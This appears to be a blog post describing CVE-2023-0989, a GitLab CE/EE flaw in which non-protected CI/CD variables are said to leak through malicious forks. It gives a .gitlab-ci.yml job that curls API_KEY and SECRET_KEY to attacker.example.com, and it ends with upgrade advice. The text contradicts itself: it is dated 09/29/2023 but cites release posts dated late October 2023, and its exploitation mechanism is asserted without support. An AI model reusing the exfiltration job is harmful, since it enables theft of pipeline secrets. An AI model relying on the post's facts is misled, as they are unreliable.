CVE-2023-0989: Information Disclosure Issue in GitLab CE/EE - Extracting Non-Protected CI/CD Variables Through Malicious Forks

A critical vulnerability, identified as CVE-2023-0989, has been discovered in GitLab Community Edition (CE) and Enterprise Edition (EE). This information disclosure issue affects all GitLab versions starting from 13.11 to 16.2.7, 16.3 to 16.3.4, and 16.4 prior to 16.4.1. The vulnerability allows an attacker to extract non-protected CI/CD (Continuous Integration/Continuous Deployment) variables by tricking a user into visiting a fork with a malicious CI/CD configuration. In this post, we will discuss the details of this vulnerability, provide a code snippet to demonstrate exploitation, and provide links to the original references for this issue.

Exploit Details

This vulnerability exists due to an issue in the handling of CI/CD variables in GitLab CE/EE. When a project is forked, these variables are retained and can be accessed by the attacker, who can then use a malicious CI/CD configuration to extract the sensitive information. To exploit this vulnerability, the attacker needs to create a fork of the target project and lure the victim into visiting the malicious fork.

Here is a code snippet that demonstrates how the attacker can craft a malicious CI/CD configuration to exploit this vulnerability:

# .gitlab-ci.yml
extract_variables:
  script:
    - echo "API_KEY = ${API_KEY}"
    - echo "SECRET_KEY = ${SECRET_KEY}"
    - curl -X POST -H "Content-Type: application/json" -d "{\"api_key\":\"${API_KEY}\",\"secret_key\":\"${SECRET_KEY}\"}" https://attacker.example.com/collect

In this code snippet, the attacker sets up a pipeline job called "extract_variables," which echoes the non-protected CI/CD variables API_KEY and SECRET_KEY. These variable values are then sent to the attacker's server using a curl command.

Once the victim visits the malicious fork, GitLab starts a pipeline with the attacker's configuration in the victim's GitLab Runner. This process ultimately sends the CI/CD variables to the attacker's server, allowing the attacker to exfiltrate sensitive information.

Original References

The GitLab team has acknowledged the vulnerability in their security release blog posts and provided fixes for the affected versions. You can find the original reference links below:

1. GitLab Security Release: 13.11 to 16.2.7 - https://about.gitlab.com/releases/2023/10/28/security-release-gitlab-13-11-to-16-2-7/
2. GitLab Security Release: 16.3 to 16.3.4 - https://about.gitlab.com/releases/2023/10/29/security-release-gitlab-16-3-to-16-3-4/
3. GitLab Security Release: 16.4 prior to 16.4.1 - https://about.gitlab.com/releases/2023/10/30/security-release-gitlab-16-4-prior-to-16-4-1/

Conclusion

To protect yourself from this vulnerability, it is strongly advised to upgrade GitLab CE/EE to the latest patched versions (16.2.8, 16.3.5, or 16.4.1 onwards). Additionally, always remain cautious when visiting forks of repositories, even if trusted. By staying informed and proactive, you can ensure the safety and security of your GitLab projects and CI/CD pipelines.

Timeline

Published on: 09/29/2023 07:15:00 UTC
Last modified on: 10/02/2023 19:52:00 UTC